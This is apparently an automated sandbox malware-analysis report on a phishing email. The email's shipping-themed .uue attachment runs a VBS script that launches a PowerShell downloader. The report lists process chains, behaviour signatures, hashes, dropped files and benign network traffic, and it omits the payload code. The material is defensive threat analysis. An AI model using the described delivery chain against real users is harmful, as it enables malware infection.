File name: backup-message-10.149.147.133_9045-13362741.eml
Full analysis: https://app.any.run/tasks/a8ee4e73-4d64-4df5-b25f-c5d468c11a65
Verdict: Malicious activity
Analysis date: July 15, 2025, 07:02:19
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: attachments, attc-unc, susp-attachments
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text, with CRLF line terminators
MD5: 35BF88423CEC4964F468B61424FEE505
SHA1: 7F33DDC1124BD3C21C4DAE82C43ECD1B621B8CBE
SHA256: 314876F703E2E2B3CE7F622305B8FDD73D5FD3DD8419D02D60F17F7480E3D6FC
SSDEEP: 3072:0CgIUI6g8T+U5sM4dxmJJoLsXhYaS3C6Ul356qK+MK3AqtD0Xd6JfxXHAZ:0RIUJLTzW5aJJFXmaS3cp6qKcE6Jfx3A

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 1480)
    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 1480)
  • SUSPICIOUS

    • Email with suspicious attachment

      • OUTLOOK.EXE (PID: 5080)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2072)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 1328)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2072)
    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2072)
    • The process executes VB scripts

      • WinRAR.exe (PID: 1328)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2072)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1480)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)
    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)
    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 1480)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 5780)
  • INFO

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 1328)
    • Email with attachments

      • OUTLOOK.EXE (PID: 5080)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2072)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)
    • Checks proxy server information

      • powershell.exe (PID: 1480)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)
    • Disables trace logs

      • powershell.exe (PID: 1480)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)
    • Manual execution by a user

      • powershell.exe (PID: 5780)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5780)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
All screenshots are available in the full report
Total processes: 154
Monitored processes: 14
Malicious processes: 2
Suspicious processes: 1

Behavior graph

Graph processes: outlook.exe, ai.exe (no specs), winrar.exe (no specs), wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), ping.exe (no specs), powershell.exe, conhost.exe (no specs), tiworker.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), slui.exe (no specs), msiexec.exe (no specs)

Process information

PID | CMD | Path | Indicators | Parent process
640 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | - | powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1328 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF.uue" | C:\Program Files\WinRAR\WinRAR.exe | - | OUTLOOK.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1352 | ping 127.0.0.1 | C:\Windows\System32\PING.EXE | - | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
1480 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script passed as the command-line argument; omitted here, see the full report>" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | - | wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2072 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa1328.27508\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF.vbs" | C:\Windows\System32\wscript.exe | - | WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4648 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | - | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4880 | "C:\WINDOWS\SysWOW64\msiexec.exe" | C:\Windows\SysWOW64\msiexec.exe | - | powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
5080 | "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml C:\Users\admin\AppData\Local\Temp\backup-message-10.149.147.133_9045-13362741.eml | C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE | - | explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\outlook.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
5288 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | - | svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5348 | "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "4778696E-5100-4E0E-88E5-F72D5A31FA66" "53200526-9914-4FB2-AEC8-0767A910B08F" "5080" | C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe | - | OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\rpcrt4.dll
Total events: 36 663
Read events: 35 530
Write events: 1 012
Delete events: 121

Modification events

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\OUTLOOK\1644
Operation: delete value | Name: 0
Value: <binary data, not displayable as text>

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\OUTLOOK\1644
Operation: delete key | Name: (default)
Value: (empty)

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\OUTLOOK\5080
Operation: write | Name: 0
Value: 0B0E10EA98D565B11AE4419A3A5B6164CD59B32300468E88E7D5E6AAFDED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C50E8908C91003783634C511D827D2120B6F00750074006C006F006F006B002E00650078006500C51620C517808004C91808323231322D44656300

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{02CAC15F-D4BE-400E-9127-D54982AA4AE9}
Operation: delete key | Name: (default)
Value: (empty)

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{11ADBD74-7DF2-4E8E-802B-B3BCBFD04A78}
Operation: delete key | Name: (default)
Value: (empty)

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{287BF315-5A11-4B2F-B069-B761ADE25A49}
Operation: delete key | Name: (default)
Value: (empty)

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{691E1C12-2693-4D4A-852C-7478657BBE6E}
Operation: delete key | Name: (default)
Value: (empty)

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{6B6B571B-F4E3-4FBB-A83F-0790D11D19AB}
Operation: delete key | Name: (default)
Value: (empty)

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{AA8FA310-0939-4CE3-B9BB-AE05B2695110}
Operation: delete key | Name: (default)
Value: (empty)

(PID) Process: (5080) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor
Operation: delete key | Name: (default)
Value: (empty)
Executable files: 0
Suspicious files: 5
Text files: 14
Unknown types: 2

Dropped files

PID | Process | Filename | Type
5080 | OUTLOOK.EXE | C:\Users\admin\Documents\Outlook Files\Outlook1.pst | -
MD5:
SHA256:
5080 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF (002).uue:Zone.Identifier | text
MD5: FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256: EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
5080 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF (002).uue | text
MD5: 45C02AD1A99B5D3970B8F44BCBBB2316
SHA256: 3A5530BA500C86061A4A8B3113F3D9C072E6B65C660BFD99A437563297662553
1480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k40sdm5u.ihe.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5080 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF.uue | text
MD5: 45C02AD1A99B5D3970B8F44BCBBB2316
SHA256: 3A5530BA500C86061A4A8B3113F3D9C072E6B65C660BFD99A437563297662553
1480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ey42fid2.iph.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5780 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lcmy5cxz.02g.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5780 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ceyki0ma.lko.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5080 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_TableViewPreviewPrefs_2_9C88E982434DAC4A81B300B83BB1E8F0.dat | xml
MD5: 0E092DB99AEE99FDFF9B5B222C732CFD
SHA256: D1614AD99ADED9F6F5C1BE7FE7FFA5124BD04A526580DA3818EA8A954E852AA6
5080 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc
MD5: 182F72A543B6A07F054B91BC0532B2BD
SHA256: 0B010D66224D7518BB64B94D26A878992E8A585B672A2AD75DFE158E60650CEB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 6
TCP/UDP connections: 28
DNS requests: 22
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1268 | svchost.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | - | unknown | - | whitelisted
6676 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | - | unknown | - | whitelisted
1200 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | - | unknown | - | whitelisted
6676 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | - | unknown | - | whitelisted
5080 | OUTLOOK.EXE | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | - | unknown | - | whitelisted
1268 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | - | unknown | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
5944 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
1268 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1028 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5080 | OUTLOOK.EXE | 52.123.128.14:443 | ecs.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
5080 | OUTLOOK.EXE | 23.48.23.18:443 | omex.cdn.office.net | Akamai International B.V. | DE | whitelisted
5080 | OUTLOOK.EXE | 52.111.229.20:443 | messaging.lifecycle.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
1268 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1268 | svchost.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.104.136.2, 20.73.194.208, 51.124.78.146 | whitelisted
google.com | 142.250.185.174 | whitelisted
ecs.office.com | 52.123.128.14, 52.123.129.14 | whitelisted
omex.cdn.office.net | 23.48.23.18, 23.48.23.66, 23.48.23.25, 23.48.23.62, 23.48.23.11, 23.48.23.52, 23.48.23.6, 23.48.23.65, 23.48.23.42 | whitelisted
messaging.lifecycle.office.com | 52.111.229.20 | whitelisted
crl.microsoft.com | 23.53.40.176, 23.53.40.178 | whitelisted
www.microsoft.com | 23.35.229.160 | whitelisted
login.live.com | 40.126.31.0, 20.190.159.131, 40.126.31.130, 40.126.31.128, 20.190.159.73, 20.190.159.128, 20.190.159.71, 20.190.159.0 | whitelisted
self.events.data.microsoft.com | 20.189.173.16 | whitelisted
ocsp.digicert.com | 2.17.190.73 | whitelisted

Threats

No threats detected
No debug info